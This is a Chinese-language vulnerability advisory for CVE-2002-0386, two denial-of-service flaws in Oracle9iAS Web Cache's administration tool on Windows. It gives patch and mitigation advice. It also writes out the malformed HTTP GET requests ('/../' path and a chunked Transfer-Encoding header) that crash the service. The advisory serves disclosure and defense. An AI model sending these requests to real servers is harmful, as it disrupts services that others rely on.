Oracle9iAS Web Cache远程拒绝服务攻击漏洞
发布日期:2002-10-28
更新日期:2002-10-31
受影响系统:Oracle Web Cache
描述:
BUGTRAQ ID:
5902
CVE(CAN) ID:
CVE-2002-0386
Oracle Web Cache是Oracle应用服务程序套件中的一部分,Web Cache设计用于在Oracle Web服务器前端作为缓冲反向代理服务器。
Oracle9iAS 9.0.2所带的Web Cache 管理模块即Web缓冲管理工具存在两个拒绝服务条件,远程攻击者可以利用这两个漏洞对服务程序进行拒绝服务攻击,导致停止对正常请求的响应。
存在两个不同的拒绝服务条件,都会引起Web Cache服务崩溃,拒绝服务可以通过发送简单的HTTP请求触发。
第一个拒绝服务攻击可以发送包含至少一个'/../'字符的HTTP GET请求,可导致Web Cache服务崩溃:
GET /../ HTTP/1.0
Host: whatever
[CRLF]
[CRLF]
第二个拒绝服务攻击可以通过畸形的GET请求触发:
GET / HTTP/1.0
Host: whatever
Transfer-Encoding: chunked
[CRLF]
[CRLF]
这两个漏洞只存在于Windows版本下的Oracle Web Cache系统。
<*来源:@stake advisories (
advisories@atstake.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103583467206317&w=2
http://www.debian.org/security/2002/dsa-173
http://otn.oracle.com/deploy/security/pdf/2002alert43rev1.pdf
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Request 1:
GET /../ HTTP/1.1
host: hostname
Enter
Enter
Request 2:
GET /some.html/ HTTP/1.1
host: host name
Transfer Encoding
Enter
Enter
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 目前Oracle还没有提供补丁,建议客户使用访问控制限制未授权用户对管理端口的访问:
1、使用防火墙技术限制访问Web Cache管理端口。
2、使用Web Cache管理工具中的"Secure Subnet"功能提供允许访问管理端口的IP地址列表或者子网段。
厂商补丁:
Oracle
------
Oracle已经为此发布了一个安全公告(OracleSA#43):
OracleSA#43:Oracle9i Application Server - Web Cache Administration Tool Crash on Malformed Request
链接:
http://otn.oracle.com/deploy/security/pdf/2002alert43rev1.pdf
但Oracle尚未提供补丁下载, 它将在Oracle9iAS 9.0.4中修复上述漏洞.
浏览次数:2831
严重程度:0(网友投票)